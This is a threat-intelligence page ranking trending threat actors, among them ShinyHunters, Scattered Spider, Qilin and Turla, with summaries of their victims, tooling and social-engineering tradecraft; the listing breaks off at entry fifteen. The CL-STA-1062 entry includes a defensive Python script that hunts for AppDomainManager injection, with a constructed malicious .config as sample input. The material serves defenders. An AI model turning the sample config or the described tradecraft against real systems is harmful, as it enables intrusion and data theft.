Mallory

Trending Adversaries

Who's moving, and how fast. Mallory tracks named threat actors across vendor reports, researcher analysis, and underground chatter, then surfaces the ones picking up momentum this week.

Ranked by Mallory's mention-velocity model across sources.

Mention map · Last week (tiles sized by mentions; color indicates mention volume, from highest to lowest)

Top 24 threat actors · Last week

#1 ShinyHunters
Cybercrime

ShinyHunters is a financially motivated cybercriminal extortion group known for data theft and "pay or leak" operations. Aliases in the provided content include bling_libra, shinyhunter, shinyhunters, shiny_hunters, UNC6040, and UNC6240. The content also references Mandiant tracking related ShinyHunters-affiliated vishing activity under clusters including UNC6240 and UNC6661. Based on the provided reporting, ShinyHunters has targeted a wide range of organizations, including insurance, telecommunications infrastructure, sports and entertainment, higher education, and education technology. Reported victims or claimed victims in the content include the National Association of Insurance Commissioners (NAIC), American Tower, Madison Square Garden / Madison Square Garden Sports / Madison Square Garden Entertainment, Instructure Canvas, and the University of Nottingham. The group is described as specializing in extortion and cascading or supply-chain-style campaigns. Multiple reports in the content state that ShinyHunters conducted "pay or leak" extortion, published stolen data on a dark web leak site, and in some cases leaked data after ransom demands were not met. The content specifically describes publication of allegedly stolen data from NAIC, American Tower, Madison Square Garden, and Madison Square Garden Sports, and notes that in the European Commission-related incident ShinyHunters later published stolen data. Tactics and techniques directly mentioned in the content include exploitation of Oracle PeopleSoft vulnerabilities, including reporting that ShinyHunters began exploiting a reported PeopleSoft zero-day on May 27 and that more than 100 organizations were compromised before Oracle released an emergency update on June 10. The content also states that ShinyHunters claimed to exploit a combination of zero-day vulnerabilities and older unpatched flaws in PeopleSoft environments, affecting both cloud-hosted and on-premises deployments.
Separately, the content repeatedly associates ShinyHunters with social engineering, especially vishing. In the Madison Square Garden Entertainment intrusion, reporting cited in the content says the initial compromise occurred through a voice-phishing call to a low-level employee, leading to theft of Microsoft Entra credentials. The content also says ShinyHunters used a similar vishing playbook against Charter Communications and breached ADT by compromising an Okta SSO account and then moving into Salesforce. The content further notes that phishing-resistant MFA can eliminate social-engineering vectors exploited by groups like ShinyHunters. The group is portrayed as capable of causing major disruption without relying on malware or zero-days in every case. The content explicitly states that groups like ShinyHunters do not necessarily need malware or zero-day exploits to cause massive damage. Reported post-compromise activity includes data theft from ticketing systems, customer support platforms, SharePoint and OneDrive-related environments, and publication of large archives containing customer, corporate, and operational data. The content also links ShinyHunters to broader criminal ecosystem activity. One report says TeamPCP maintained partnerships or overlap with ShinyHunters, and another states ShinyHunters later published data stolen in the TeamPCP-related European Commission incident. The content does not provide high-confidence evidence that ShinyHunters is a nation-state actor; it is described as a cybercriminal group.

Mentions: 28
#2 Icarus

Icarus is a newly emerged cybercrime extortion group active since at least April 2026. In the provided reporting, Icarus claimed responsibility for the June 2026 supply-chain attack involving Klue, a market intelligence platform, and the downstream compromise of multiple customers’ Salesforce environments. Public reporting and victim statements describe Icarus as a ransomware or extortion group operating a Tor-based leak site and threatening to publish stolen data unless ransom demands were met. According to the content, Icarus gained access to Klue using a compromised legacy credential tied to an integration service or limited 2022 pilot, then harvested or generated OAuth tokens used by Klue integrations. The group used those tokens to access connected third-party platforms, especially Salesforce, and exfiltrated data in bulk. Reporting also states the attackers implanted or pushed malicious code in Klue’s environment, enumerated victim Salesforce environments through the REST API, and used automated scripts, including Python scripts, to map CRM structures and steal targeted data over sustained periods. The group’s activity in this incident was focused on data theft and extortion rather than disruptive encryption. Stolen data was consistently described as business contact information, CRM records, support case data, sales-related information, pricing quotes, account data, and related business records. Multiple organizations were publicly identified as affected through the Klue compromise, including Huntress, LastPass, BeyondTrust, HackerOne, Jamf, OneTrust, Recorded Future, Snyk, Tanium, Insurity, Sprout Social, Gong, 8x8, Pendo, and others. Icarus added Klue and several customers to its leak site and directly threatened release of the stolen information. The content does not provide high-confidence attribution of Icarus to any nation state. 
Huntress is cited as attributing the Klue intrusion to Icarus with high confidence, while other reporting noted disputed attribution involving ShinyHunters; therefore only the direct reporting that Icarus claimed responsibility and was independently linked by Huntress to the incident is high confidence here. No aliases or sub-groups beyond the name Icarus are directly supported in the content.

Mentions: 25
#3 Scattered Spider
Financially Motivated

Scattered Spider is a financially motivated cybercriminal threat actor active since at least May 2022. It is also tracked as UNC3944, Octo Tempest, 0ktapus/Oktapus, Scatter Swine, Storm-0875, Muddled Libra, DEV-0971, LUCR-3, Roasted 0ktapus, Star Fraud, and related spellings. Multiple sources in the content describe it as an English-speaking collective, with members primarily based in the United States, the United Kingdom, and Canada, and note that it has recruited teenagers. The group initially targeted telecommunications and business process outsourcing organizations, including activity aimed at gaining access to mobile carrier environments for SIM swapping, and later expanded to other sectors including technology, retail, hospitality, gaming, financial services, managed service providers, manufacturing, law, natural resources, healthcare, airlines, and critical infrastructure. The content links Scattered Spider to attacks or intrusions involving Twilio, Okta customers, MGM Resorts, Caesars Entertainment, Transport for London, Marks & Spencer, Harrods, Co-op Group, SSM Health, and Sutter Health. Scattered Spider is characterized by aggressive social engineering and identity-focused intrusion tradecraft. Reported techniques include vishing, smishing, phishing, adversary-in-the-middle credential theft, MFA fatigue, SIM swapping, impersonation of employees to help desks, impersonation of IT or support personnel by phone, SMS, and Microsoft Teams, and use of harvested personal information to pass identity checks. The group has directed victims to credential harvesting sites, convinced them to run commercial remote monitoring and management tools, and manipulated help desks to reset passwords and transfer MFA enrollment to attacker-controlled devices. The content also notes use of AI voice cloning by fragments of the group to impersonate executives or trusted vendors in calls to internal IT help desks. 
After access, Scattered Spider has conducted reconnaissance across Windows, Linux, VMware ESXi, Azure Active Directory/Microsoft Entra ID, Microsoft 365, Google Workspace, AWS, SharePoint, Slack, Microsoft Teams, Exchange Online, code repositories, backups, VPN documentation, Active Directory data, and Snowflake access. Reported tooling and techniques include use of legitimate remote access and tunneling tools such as AnyDesk, ScreenConnect, Splashtop, TeamViewer, Pulseway, Tactical RMM, Fleetdeck.io, Level.io, Tailscale, Teleport.sh, Ngrok, LogMeIn, and ConnectWise Control; living-off-the-land techniques; valid accounts; and searches for credential documentation and incident response activity. The group has also been reported using AWS Systems Manager Inventory for discovery and lateral movement targeting. For credential access, privilege escalation, persistence, and defense evasion, the content describes Scattered Spider registering attacker-controlled MFA tokens, adding a federated identity provider to SSO tenants with automatic account linking, abusing self-service password reset and help-desk workflows, and using legitimate remote access tools for persistence. Reported tools and malware include Mimikatz, POORTRY, STONESTOP, AveMaria/WarZone, Raccoon Stealer, VIDAR Stealer, RattyRAT, and Bedevil. The group has used signed or vulnerable drivers to disable security tools, including a maliciously signed Intel Ethernet diagnostics driver and exploitation of CVE-2015-2291 in iqvw64.sys. The content also states Scattered Spider exploited CVE-2021-35464 in ForgeRock AM for unauthenticated remote code execution and privilege escalation on an AWS instance. Scattered Spider engages in data theft, extortion, and ransomware. The content states it has exfiltrated data to services including MEGA and Amazon S3, and has stolen data from repositories, cloud platforms, email, and enterprise systems. 
It has operated as a ransomware affiliate, including affiliation with ALPHV/BlackCat, and more recent reporting in the content says trusted third parties observed deployment of DragonForce ransomware. Other content also notes Scattered Spider as a notable ransomware affiliate associated with ecosystems including RansomHub and DragonForce. VMware ESXi targeting is specifically highlighted, with reporting that the group can move from initial access to exfiltration and ransomware deployment within hours and has focused on hypervisor-level attacks. The content also includes law-enforcement reporting tying alleged members of Scattered Spider to major intrusions. In the UK, Thalha Jubair and Owen Flowers were identified as key members and pleaded guilty in relation to the 2024 Transport for London attack; reporting also links Flowers to intrusions at SSM Health and Sutter Health. Additional prosecutions and allegations in the content reference members including Tyler Buchanan and Noah Michael Urban.

Mentions: 18
#4 Qilin
Financially Motivated

Qilin is a financially motivated ransomware-as-a-service (RaaS) group active since at least March 2022. Known aliases in the provided content include Agenda, Gold Feather, Qilin, Qilin Gang, Qilin Ransomware, Qilin Ransomware Gang, Qilin Ransomware Group, Qirin, and Water Galura. The group is described as having high scalability, with multiple personas including @Haise promoting Qilin on the RAMP forum. The content places Qilin within a broader ransomware ecosystem that includes affiliates, access brokers, and cooperation or overlap with other crews. Symantec, Carbon Black, and related reporting link the initial access broker Woodgnat, also known as KongTuke, to attacks involving Qilin; Woodgnat has been observed using ModeloRAT and Mistic to obtain and sell access to ransomware operators including Qilin. ModeloRAT was separately observed in attacks that deployed Qilin ransomware. The content also states that DragonForce attempted public cooperation with Qilin and LockBit, and that VX-Underground reported DragonForce, LockBit, and Qilin attempted to establish communication channels. Group-IB reported that Gentlemen was founded by hastalamuerte, described as a former Qilin affiliate. Qilin has broad victim reach. Black Kite’s 2026 European Cyber Risk Report states Qilin operated in 26 of 31 analyzed European countries, giving it the widest geographic reach among the ransomware groups covered. S2W ranked Qilin among the top five highest-risk ransomware groups in H1 2025 and reported that Qilin carried out the most attacks against government agencies in that period, with 12 cases. The content specifically identifies Qilin as highly active in healthcare. It states that Qilin remained one of the most active ransomware groups affecting the healthcare sector in June 2026. 
A notable incident attributed to Qilin was the June 2024 attack on Synnovis, in which the group targeted the company’s internal network and exfiltrated about 394.1 GB of sensitive patient data shared by several NHS foundation trusts for pathology testing. Reporting in the content states that more than 90,000 NHS patients’ records were affected and that the disruption impacted pathology, blood testing, and diagnostic services across multiple NHS organizations. Based on the provided content, Qilin should be characterized as a major ransomware operation with wide geographic reach, active affiliate or ecosystem relationships, and observed links to initial access brokers and tooling used to facilitate ransomware deployment.

Mentions: 15
#5 Akira

Akira is a financially motivated ransomware group active since at least March 2023. Known aliases in the provided content include Gold Sahara, Howling Scorpius, Punk Spider, and Storm-1567. The group released a Linux variant in June 2023 that has been used against VMware ESXi environments; reported incidents describe attackers gaining access to ESXi hypervisors, shutting down virtual machines, and encrypting .vmdk files. The content states that Akira’s Linux variant uses chunk-based partial encryption logic for large files and has been observed partially encrypting virtual machine-related file types such as VMDK, VHDX, and VDI. The group is linked in the content to exploitation of SonicWall SSLVPN appliances via CVE-2024-40766 since at least September 2024, including compromises of SSLVPN accounts on vulnerable devices. Akira is also mentioned in relation to Citrix brute-forcing activity reported by Rapid7 that ultimately led to Akira and LockBit 3.0 ransomware intrusions. Akira appears in multiple reports as part of broader ransomware ecosystems supplied by the initial access broker Woodgnat, also known as KongTuke. Those reports state that Woodgnat sells compromised network access to ransomware groups including Akira, Qilin, Interlock, Rhysida, 8Base, and Black Basta, and that tools such as ModeloRAT and Mistic have been observed in activity linked to access later used by Akira-associated operations. Victimology in the provided content indicates substantial activity in the United States, with one report stating that Akira, alongside Qilin and DragonForce, draws close to half of its publicly claimed victims from the US. The content also notes continued attacks across Asia, Europe, and North America, identifies Akira as one of the more active groups affecting healthcare in June 2026, and lists it among representative ransomware groups capable of targeting major-event-related organizations. The content does not attribute Akira to a nation state.

Mentions: 13
#6 World Leaks

World Leaks is a cybercriminal extortion group that emerged in early 2025 as a rebrand of the Hunters International ransomware operation, which had been active since 2023. Reporting in the provided content describes World Leaks as the successor to Hunters International and notes a strategic shift away from file encryption toward pure data theft and leak-based extortion, with the group stealing company data and threatening public release unless payment is made. Known aliases in the content are World Leaks, WorldLeaks, world_leaks, and Hunters International. The group has been linked in the content to incidents affecting organizations in manufacturing, healthcare, technology, consumer services, and energy, with many claimed victims in the United States as well as victims in Europe, Canada, India, and China. Specific victim claims or links mentioned in the content include Tata Electronics, Nike, Dell, Bradford Health Services/Bradford Health Partners, Fred Hutchinson Cancer Center, and other organizations listed on its leak site. For Tata Electronics, World Leaks claimed to have stolen and published more than 200,000 files totaling over 630 GB, and reporting cited alleged exposure of emails, event logs, employee passport copies, SAP-related records, and documents tied to Apple and Tesla. The content also states that World Leaks made ransom demands in connection with Tata Electronics and that researchers observed the data on the group’s Tor-accessible dark web site. In the Nike case, World Leaks claimed theft of 1.4 TB across 188,000 files. The content also notes that some prior claims, such as Dell, involved more limited data than initially implied. The provided reporting states that World Leaks focuses on data exfiltration and extortion rather than encrypting victim systems. 
One source in the content says the group commonly gains initial access through phishing, compromised credentials, or exploitation of exposed services, then performs data discovery and exfiltration, prioritizing confidential corporate or personal information. The content also notes Hunters International use of Rclone as a primary exfiltration tool with WinSCP as a fallback in some intrusions. World Leaks is described in the content as an active extortion actor in the broader ransomware ecosystem despite its move away from encryption, and one report identifies LockBit, World Leaks, and TheGentlemen as leading groups observed targeting organizations in China.

Mentions: 12
#7 Indrik Spider
Financially Motivated

Evil Corp is a Russian-speaking cybercriminal group, also known as Indrik Spider, that has been linked in the provided content to Zeus and Dridex malware and to multiple large-scale ransomware and money-laundering operations. The aliases provided include DEV-0243, Gold Drake, Manatee Tempest, UNC2165, and Indrik Spider. The content also associates Evil Corp with ransomware operations including WastedLocker, Hades, Macaw Locker, and Phoenix CryptoLocker. The group is repeatedly linked to the SocGholish malware ecosystem. SocGholish, also known as FakeUpdates, is described as a dropper/loader distributed through fake browser update prompts on compromised websites, especially compromised WordPress sites. The content states that SocGholish has been used as an initial access mechanism and that it helped criminals gain access to computer systems. Multiple sources in the content say SocGholish is linked to Evil Corp, and some reporting describes it as a key infection chain used by the group. The content also states that SocGholish has allegedly provided initial access to victims for Evil Corp since at least 2018. The content further notes that SocGholish operators have been tracked separately under aliases including DEV-0206, Gold Prelude, Mustard Tempest, TA569, and UNC1543, and that this activity acts as an initial access broker associated with Evil Corp. Reporting in the content also references Maksim Yakubets in connection with Evil Corp. Operation Endgame reporting cited in the content describes law enforcement disruption of infrastructure tied to SocGholish and Evil Corp, including server and domain seizures and remediation of compromised websites.

Mentions: 11 · Origin: RU
#8 Turla

Turla is a Russia-linked, state-sponsored cyber-espionage threat actor widely tracked as Secret Blizzard, Venomous Bear, Snake, Waterbug, Uroburos/Ouroboros, Krypton, Summit, and UAC-0194. Multiple cited sources link Turla to Russia’s Federal Security Service (FSB), and the group is described as one of Russia’s longest-running espionage actors, active since at least 2004. The reporting in the provided content focuses on Turla’s use of the .NET backdoor STOCKSTAY, which Google Threat Intelligence Group assessed has been under development since at least December 2022. STOCKSTAY has been used in espionage operations against government and military organizations in Ukraine and against entities with an interest in Italian foreign policy; early related activity was also observed in Italy, the Netherlands, Poland, and Germany. The malware is a modular Windows Forms-based backdoor using secure WebSocket command-and-control, WM_COPYDATA-based IPC, and components for downloading payloads, tunneling traffic, orchestration, persistence, reconnaissance, file operations, registry manipulation, screen capture, and command execution. Researchers reported significant code and architectural overlap between STOCKSTAY and Turla’s KAZUAR framework, and assessed that STOCKSTAY may be developed in parallel with KAZUAR as a redundant or complementary espionage capability. Observed Turla delivery and intrusion methods in the content include phishing emails with malicious RDP configuration files, MSI installers, HTA-based chains, and RAR archives exploiting CVE-2025-8088. Lures repeatedly used academic, diplomatic, and military themes, including abuse of a compromised Ukrainian university account and a diplomatic education platform. Turla also used compromised in-country Ukrainian infrastructure, GitHub-hosted components, compromised WordPress sites, and third-party hosting platforms such as Render and Glitch to stage payloads and obscure infrastructure.
The content also notes Turla’s use of Mshta to launch scripts via HTML Applications, its historical association with the Snake implant, and reporting that it used Amadey infections to deploy custom malware against targets in Ukraine. In early 2025, ESET observed collaboration between Gamaredon and Turla, with Gamaredon providing initial access through its loaders for deployment of Turla’s KAZUAR framework. Separate reporting cited in the content also states that Turla previously compromised or used OilRig infrastructure in operations. Overall, the provided material characterizes Turla as an active Russian espionage actor focused on government, military, diplomatic, and related high-value targets, especially in Ukraine, using modular malware, phishing-based initial access, stealthy infrastructure practices, and overlapping toolsets including STOCKSTAY and KAZUAR.

Mentions: 10 · Origin: RU
#9 8Base

8Base is a financially motivated ransomware operation active since at least 2022, publicly unveiled in May 2023, and widely described as highly active from mid-2023 into 2024. The group is linked in the provided content to the Phobos ransomware ecosystem and is described as an operator or affiliate user of Phobos ransomware, including a customized variant that appends the ".8base" extension to encrypted files and slightly modifies standard Phobos ransom notes. The content also describes 8Base as using double-extortion tactics, with victim disclosures central to its strategy via Tor-based leak sites and at times mirrored through surface-web infrastructure. Its leak-site workflow included staged disclosure, Telegram-based victim negotiation, and outreach to journalists. The group primarily targeted small and medium-sized organizations worldwide, with the content specifically noting victims concentrated in Western countries and sectors including finance, manufacturing, healthcare, and a broad range of other industries. Reported victims or claimed victims in the provided content include the UN Development Programme, the UN International Civil Aviation Organization recruitment database, the Atlantic States Marine Fisheries Commission, and a Canadian agency administering dental benefit plans for disabled people in Alberta. The content ties 8Base closely to Phobos tradecraft and infrastructure. Phobos/8Base activity is described as commonly gaining access via exposed or compromised RDP, phishing, brute force, initial access brokers, and SmokeLoader. During intrusions, 8Base is reported to use SmokeLoader for obfuscation, unpacking, and loading of Phobos ransomware, and SystemBC as a SOCKS5 proxy or RAT to conceal command-and-control traffic, execute commands, deploy payloads, or exfiltrate data. 
The content also states that Phobos and 8Base disabled security tools, deleted backups, modified registry entries, and in some reporting modified firewall rules to evade detection and maintain access. The provided reporting indicates that 8Base likely did not operate as a fully independent stack. Malware hashes and infrastructure associated with 8Base overlapped with ALPHV, BianLian, Knight, and Play, and the content concludes that 8Base likely operated within a shared-backend ransomware ecosystem rather than as a fully independent group. The content also notes historical public links between access sold by the initial access broker KongTuke/Woodgnat and ransomware crews including 8Base, alongside Qilin, Interlock, Rhysida, Akira, and Black Basta. Operationally, 8Base maintained rotating onion infrastructure, Telegram channels, and a temporary surface-web presence. One report cited 459 recorded victims between May 2023 and February 2025, with the last recorded victim dated 1 February 2025. Multiple sources in the content describe the brand as disrupted, dormant, or fragmented following international law-enforcement action in February 2025, including seizure of its leak site and arrests tied to Operation Aether. Known aliases or related designations directly mentioned in the content include 8base and association with Phobos; one source also states the group used a leak site called "Space Bears."

Mentions: 9
#10 Black Basta

Black Basta is a financially motivated ransomware operation active since at least 2022. The group is referenced as part of the ransomware ecosystem and has been linked in reporting to initial access obtained by brokers such as Woodgnat/KongTuke, which has been publicly associated with attacks involving Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta. Reporting cited here states that in November 2022 Black Basta used the QakBot loader for initial access by hijacking legitimate email threads and sending phishing emails. Black Basta has also been observed exploiting or discussing vulnerabilities and remote access tooling: leaked Black Basta chat logs included active discussion of CVE-2024-3400 in Palo Alto PAN-OS, and the group has been seen exploiting Microsoft Quick Assist for initial access and persistence. CISA #StopRansomware advisories cited in the content state that Black Basta uses PsExec as a primary ransomware propagation tool. Additional reporting in the provided content describes Black Basta operational TTPs in detail, including use of EDR impairment tooling such as AvNeutralizer/AuKill, which telemetry indicated was used exclusively by the group for six months before later spreading to other ransomware actors. SentinelLABS assessed it is highly likely the Black Basta ransomware operation has ties to FIN7. Leaked Black Basta Matrix chat logs from 2025, covering September 2023 to September 2024, portray the group as a mature criminal enterprise with structured operations, two offices in Moscow, collaboration with other ransomware and malware actors, and use of ChatGPT for phishing pretexts, malware rewriting, debugging, and victim intelligence collection. Analysis of those leaks cited in the content reported potential connections to Russian authorities and identified alleged continuity with Conti-era personnel and tradecraft, including references linking leader GG/AA to Conti’s Tramp. 
The same reporting states Black Basta collaborated with or maintained relationships involving former Conti/Trickbot, BlackSuit/Royal, Rhysida, and Cactus-linked actors, and used or rented malware families and loaders including Pikabot, DarkGate, IcedID, and LummaC2 while developing a custom post-exploitation framework called Breaker. The content also discusses Black Basta’s Linux/ESXi-focused ransomware alongside that of other major ransomware groups, although one cited report found no obvious similarity between Black Basta’s ESXi lockers and Babuk-derived families. Known alias mentioned in the content: Storm-1811.

Mentions: 9
#11 Interlock

Interlock is a financially motivated ransomware group, tracked internally by IBM X-Force as Hive0163, that has been running ransomware campaigns since September 2024. Reporting in the provided content describes Interlock as targeting healthcare and other critical infrastructure, as well as education, local government/administration, and other large organizations in North America and Europe. Multiple examples in the content attribute or associate Interlock with attacks affecting DaVita, Kettering Health, Goodwill Industries International, Lexington-Richland School District Five, West Lothian Council, and Texas Tech University Health Sciences Center. The group is described as particularly active against education organizations, with one report stating that 27.3% of its total victims were in that sector, well above the broader ransomware average. Other reporting says Interlock historically targeted education, engineering, architecture, construction, manufacturing, industrial, healthcare, government, and public sector organizations. Interlock has been linked to the TAG-124 / KongTuke / Woodgnat traffic distribution and initial access ecosystem. The content states that KongTuke/Woodgnat acts as an initial access broker selling access to ransomware groups including Interlock, and that Interlock also uses or benefits from TAG-124 traffic distribution services. Interlock has also been associated with malware and tooling overlaps involving Rhysida. IBM X-Force reported strong connections between Interlock and Rhysida, including shared use of the Supper backdoor (also known as SocksShell or WINDYTWIST), similarities between Supper, InterlockRAT, NodeSnake, JunkFiction, and ModeloRAT, and likely overlapping developers or trusted code sharing. Cisco Talos was cited as previously assessing with low confidence that Interlock may have emerged from Rhysida operators or developers. 
Tactics and techniques directly mentioned in the content include use of trojanized software installers, fake Microsoft Teams download pages, traffic distribution systems, ClickFix-style lures, and fake browser updates for initial access and payload delivery. Interlock has been repeatedly linked to TAG-124, also tracked as LandUpdate808. IBM also reported methodical post-compromise activity including credential theft, use of AZcopy and Advanced Port Scanner, and a custom Windows Defender Application Control policy on Interlock staging servers designed to suppress Defender and endpoint protections. Amazon threat intelligence reported that Interlock exploited CVE-2026-20131 in Cisco Secure Firewall Management Center beginning on January 26, 2026, 36 days before public disclosure, and also noted use of ConnectWise ScreenConnect, Certify, Volatility, custom JavaScript and Java remote access trojans, a fileless Java memory-resident backdoor, and PowerShell-based reconnaissance. The content also notes that Interlock shares similarities with Rhysida in tactics, tools, and encryption behaviors, but the exact relationship is described as unknown. Interlock is not described in the provided content as a nation-state actor.

Mentions: 8
#12 Rhysida

Rhysida is a financially motivated ransomware group active since at least May 2023 that operates as a Ransomware-as-a-Service platform. Reporting in the provided content describes Rhysida as notable for extorting healthcare organizations and other critical infrastructure, with healthcare, education, and government also cited among affected sectors. Most victims referenced in one IBM X-Force analysis were in the United States. The group has been linked to incidents affecting healthcare organizations and public-sector entities, including claims around Prospect Medical Holdings, Cookeville Regional Medical Center, Columbus city systems, and an airport attack referenced in the content. The content links Rhysida to several upstream criminal service providers and tooling ecosystems. Multiple reports state that the initial access broker Woodgnat, also known as KongTuke, has sold or enabled access for ransomware groups including Rhysida, alongside Qilin, Interlock, Akira, 8Base, and Black Basta. Woodgnat has used compromised WordPress sites, ClickFix/FileFix/CrashFix lures, and Microsoft Teams helpdesk impersonation to obtain access. Rhysida operators have also been associated with use of SYSTEMBC, which Kroll says is favored by Rhysida operators and was deployed after access in at least one healthcare intrusion. Intel 471 also lists Rhysida among groups observed exploiting AnyDesk. The provided content highlights strong links between Rhysida and Interlock. IBM X-Force reported that both groups used the Supper backdoor, also known as SocksShell or WINDYTWIST, and found code and behavioral similarities across Supper, InterlockRAT, NodeSnake, JunkFiction, and ModeloRAT. Both groups were described as relying on trojanized software installers, fake Microsoft Teams download pages, traffic distribution systems, and ClickFix-style lures for initial access and payload delivery. 
IBM also noted post-compromise use of tools such as AZcopy, Advanced Port Scanner, and credential stealers. Another source in the content states the exact relationship between Interlock and Rhysida is unknown, while Cisco Talos previously assessed with low confidence that Interlock may have emerged from Rhysida operators or developers. Additional reporting in the content discusses a possible rebrand from Vice Society to Rhysida, but this is presented as analysis of a possible rebrand rather than a confirmed fact. The content also references Rhysida in broader ransomware ecosystem reporting, including use of traffic distribution services such as TAG-124 and mention in Microsoft reporting on Fox Tempest-enabled malware-signing activity.

Mentions: 8
#13 CL-STA-1062

CL-STA-1062 is a Chinese-speaking threat actor active since at least March 2022, conducting persistent operations across East Asia and, from mid-2025 onward, focusing on Southeast Asian government entities and state-owned critical energy infrastructure. Palo Alto Networks Unit 42 assessed with high confidence that CL-STA-1062 overlaps with Cisco Talos-tracked UAT-7237, which was previously linked to campaigns against web hosting infrastructure in Taiwan. Reported targeting includes government agencies, state-owned enterprises in the energy sector, and other critical infrastructure organizations in Southeast Asia, with the activity described as espionage. The actor uses a hybrid toolkit combining open-source and publicly available tools with custom malware. Observed tools include ASPX web shells planted on vulnerable web applications to establish initial access, SoftEther VPN, VNT, Yuze, Mimikatz, and JuicyPotato. The group has disguised tooling as legitimate processes or software, including VMware executables and XDR agents, and has used password-protected RAR archives to stage tools and stolen data. Observed post-compromise activity includes reconnaissance, traceroute-based mapping to identify lateral movement opportunities, privilege escalation, persistent tunneling, MSSQL data theft, exfiltration of web server source code, and broader data exfiltration. A custom backdoor associated with the actor is TinyRCT, a previously undocumented lightweight C#/.NET backdoor also seen as PerfWatson2.exe. TinyRCT supports arbitrary command execution, file and directory enumeration, file exfiltration, screenshot capture, payload download, and self-deletion. It communicates over HTTP with hardcoded command-and-control infrastructure and uses AES-128-CBC encryption. 
Delivery observed in reporting used a malicious chrome_setup.zip archive containing a legitimate, signed executable named chrome_setup.exe, a malicious chrome_setup.exe.config file, and a rogue MyAppDomainManager.dll. The .config file points the .NET runtime's AppDomainManager settings at the rogue DLL, so the CLR loads attacker code inside the signed, legitimately named process before the application's own entry point runs (AppDomainManager injection, which requires a .NET host); that code then downloads the TinyRCT payload and establishes persistence via a scheduled task. Known alias: UAT-7237.
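
The .config-driven loading described above can be hunted for mechanically. The following Python check is added here as an illustration; it is not taken from Unit 42's reporting or from the actor's files. It parses an .exe.config for the CLR's appDomainManagerAssembly and appDomainManagerType keys, records any probing paths that widen where the runtime looks for that assembly, and cross-checks whether the named managed DLL ships beside the executable. The sample configuration and file listing are constructed; the element names are the real .NET runtime configuration keys, and MyAppDomainManager is used as the assembly name only because the reporting names that DLL.

```python
"""Flag .exe.config files that redirect the CLR AppDomainManager.

The .NET runtime honours <runtime><appDomainManagerAssembly value=.../> and
<appDomainManagerType value=.../> in an application's .config and instantiates
the named type inside the host process before Main() runs. Legitimate configs
almost never set these keys, so their presence beside a signed executable is a
strong hunting signal. Added example; sample data below is constructed.
"""
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Optional

# Constructed config modelled on the technique (assembly name hypothetical).
SAMPLE_CONFIG = """<configuration>
  <runtime>
    <appDomainManagerAssembly value="MyAppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="MyAppDomainManager" />
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <probing privatePath="lib" />
    </assemblyBinding>
  </runtime>
</configuration>
"""

# Constructed benign config: only pins the runtime version.
BENIGN_CONFIG = """<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
  </startup>
</configuration>
"""


def _runtime_value(root: ET.Element, key: str) -> Optional[str]:
    """Return the value attribute of <runtime><key value=.../>, if present."""
    node = root.find(f"./runtime/{key}")
    return node.get("value") if node is not None else None


def analyse_config(xml_text: str) -> dict:
    """Return findings for one .exe.config document.

    managed_dll is the file the CLR will try to load (assembly simple name +
    '.dll'), which a hunter can then look for on disk or in the archive.
    """
    root = ET.fromstring(xml_text)
    asm = _runtime_value(root, "appDomainManagerAssembly")
    typ = _runtime_value(root, "appDomainManagerType")
    findings = {"appdomain_manager_override": False, "managed_dll": None, "probing_paths": []}
    if asm or typ:
        findings["appdomain_manager_override"] = True
        if asm:
            simple_name = asm.split(",", 1)[0].strip()
            findings["managed_dll"] = simple_name + ".dll"
    # <probing privatePath> extends the CLR's search path for that assembly;
    # the element is namespaced, so match on the local tag name.
    for node in root.iter():
        if node.tag.endswith("probing") and node.get("privatePath"):
            findings["probing_paths"].extend(node.get("privatePath").split(";"))
    return findings


def scan_archive_listing(file_names: list, config_xml: str) -> list:
    """Combine config findings with a file listing (e.g. ZIP contents) and
    return human-readable alerts; an empty list means nothing suspicious."""
    f = analyse_config(config_xml)
    alerts = []
    if f["appdomain_manager_override"]:
        alerts.append("runtime/appDomainManagerAssembly or appDomainManagerType is set")
        dll = f["managed_dll"]
        if dll and any(Path(n).name.lower() == dll.lower() for n in file_names):
            alerts.append(f"{dll} ships alongside the executable: matches AppDomainManager injection")
    return alerts


if __name__ == "__main__":
    # Constructed listing mirroring the archive layout described in the reporting.
    listing = ["chrome_setup.exe", "chrome_setup.exe.config", "MyAppDomainManager.dll"]
    for alert in scan_archive_listing(listing, SAMPLE_CONFIG):
        print("ALERT:", alert)
    print("benign:", scan_archive_listing(["app.exe", "app.exe.config"], BENIGN_CONFIG))
```

The same two keys can also be supplied through the APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environment variables, so a complete hunt should cover process environments as well as .config files.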

Mentions: 7 · Origin: CN
#14 Woodgnat

Woodgnat, also known as KongTuke, is a financially motivated cybercrime actor that operates primarily as an initial access broker; it is not assessed to be state-sponsored. Active since at least May 2024, the group establishes durable remote access in enterprise environments and sells that access to ransomware affiliates and other attackers. It has been publicly linked to ransomware ecosystems including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta. Woodgnat’s targeting is described as largely opportunistic; reported victims span the insurance, education, IT, and professional services sectors, including schools and insurance firms. The group is associated with the deployment of ModeloRAT, a Python-based remote access trojan, and with the backdoor Mistic, also tracked by Zscaler as MLTBackdoor; in at least one intrusion, Mistic and ModeloRAT were used together. The actor is known for social-engineering-driven initial access. Reported delivery methods include compromised WordPress sites used to serve fake technical alerts and browser-based lures, including ClickFix, FileFix, and CrashFix, that trick users into copying, pasting, or executing malicious PowerShell commands. Since around April 2026, the group has also used external Microsoft Teams messages impersonating IT helpdesk or support personnel to persuade victims to run malicious commands. Observed tradecraft includes multi-stage PowerShell infection chains, DLL sideloading, in-memory execution, credential theft using fake login prompts, reconnaissance with native Windows tools, and use of legitimate utilities including curl, reg.exe, net.exe, PowerShell, certutil, and WMIC. Mistic has been described as a stealthy persistence mechanism that can manage files, execute code received from command-and-control directly in memory, adjust beaconing frequency, and self-delete via a kill switch. 
Symantec also reported that Woodgnat profiles compromised machines to determine their value and whether access can be sold.

Mentions: 6
#15 Gamaredon Group

